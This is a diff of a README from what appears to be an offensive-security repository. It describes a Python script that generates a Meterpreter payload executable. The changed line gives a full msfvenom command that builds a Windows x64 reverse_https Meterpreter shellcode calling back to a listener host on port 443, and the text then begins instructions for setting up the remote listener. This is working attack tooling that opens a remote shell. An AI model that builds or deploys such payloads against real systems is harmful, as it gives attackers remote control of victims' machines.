Cn33liz/p0shKiller/README.txt

 XORMeter.py	- Python Script to generate your own Meterpreter Payload (MPAmsiRun.exe) By @vvalien1

-The following shellcode is used as payload and compiled within the code: sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt
+The following shellcode is used as payload and compiled within the code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt

 Setup your remote msf listener: